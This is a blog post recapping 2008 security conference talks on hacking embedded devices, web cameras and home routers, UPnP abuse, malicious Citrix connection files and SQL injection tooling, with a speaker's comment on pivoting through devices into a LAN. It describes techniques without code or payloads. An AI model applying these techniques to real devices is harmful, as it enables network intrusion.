Dan Griffin's Blog

Comments on security, PKI, smart cards, cryptography, and entrepreneurship.

I’m sitting in the Krakow airport, waiting for my return flight via Chicago, very tired, but also very glad I came. Foremost, I met new colleagues and made great connections at Confidence. And I learned a lot. Can’t wait for next year!

The second day of the conference (Saturday) started with Adrian Pastor’s (http://www.gnucitizen.org/about/ap/) discussion on embedded device hacking. His first demo consisted of injecting an XSS link into the administrative log of an Axis 2100 web camera. Assuming you can get the admin to look at the log, it’ll run your script on the camera, which supports both ‘mish’ (a minimal shell) and PHP.

Adrian has also spent a lot of time hacking British Telecom’s home broadband routers (see the site referenced above). I have no doubt that he’s made some great friends at that company ;) Other attacks:

[Update - the plane from Krakow loaded faster than I thought, and then I went to sleep, so now it's Monday and I'm back in Seattle.]

  1. Using embedded devices, when not segmented, as a stepping stone for Java script-based networking scanning
  2. Stealing password files from embedded devices. For example, many store plaintext passwords, and some are susceptible to pre-authentication attacks, especially via whatever CGIs they may expose.

Petko Petkov (http://www.gnucitizen.org/author/pdp/) was next on the Saturday conference speaker list. Highlights:

  1. UPnP fun. If you can get a DSL router to run your script, then you can probably reconfigure it and other devices on that network via UPnP. For example, setup a port forwarding rule for all incoming email …
  2. Lack of filtering for RDP (as in, Microsoft Terminal Server connection short-cuts) and Citrix files. Particularly regarding the latter, which allows an attacker to send a victim a Citrix connection file which, when run, can automatically connect to a remote system, run a program, then disconnect. The user will have no idea what just happened (delete files, open a port, whatever).

Dinis Cruz (http://blogs.owasp.org/diniscruz/) was up next, and demonstrated a custom scriptable front-end he wrote (called F1) for Ounce Lab’s source code scanning product. F1, written in C#, is like an IDE on steroids. One of the panels uses the GLEE graphing/flow-chart control, for example, which looks totally cool. I hope he’ll post more information about his work; perhaps we’ll see it when the Confidence slides go up.

After Dinis came lunch. After lunch, the weather was so nice that I pretty much just sat around and conversed with attendees outside for the rest of the day. Very relaxing!

One highlight I neglected to mention from the first day - Alberto Revelli presented his Sqlninja (http://sqlninja.sourceforge.net/) tool, which does some cool things, including the “DNS tunneled pseudo-shell”.

Permalink |

1 Comment »

  1. Just a note regarding using a Internet-facing (unsegmented) embedded device as a stepping stone to probe the LAN: you don’t need JavaScript to do this. Most embedded devices have built-in functionalities for accurate port-scanning, ping sweeping and even vulnerability scanning.

    Examples:

    - ping diagnostic tool: can be wrapped around with a script run by the attacker (i.e.: bash) which loops through RFC1918 IP addresses in order to discover live internal hosts

    - DHCP client list: if the target is an Internet gateway, such feature would return MAC addresses and IP addresses of those clients that are connected via automatic network settings (NOT static IP configuration)

    - port-forwarding rules: allows you to expose ports from internal machines directly to the Internet

    - built-in scripting environments and/or dynamic server-side languages. A good example is Axis IP cameras with Mish and PHP support. For instance, you can port a web vulnerability scanner to Mish which you ultimately run via the camera’s telnet interface.

    Finally, to be precise, the video stream replacement exploit combines 2 persistent XSS vulnerabilities with a forged request (CSRF).

    Comment by Adrian Pastor — May 19, 2008 @ 5:25 pm

RSS feed for comments on this post. TrackBack URL

Leave a comment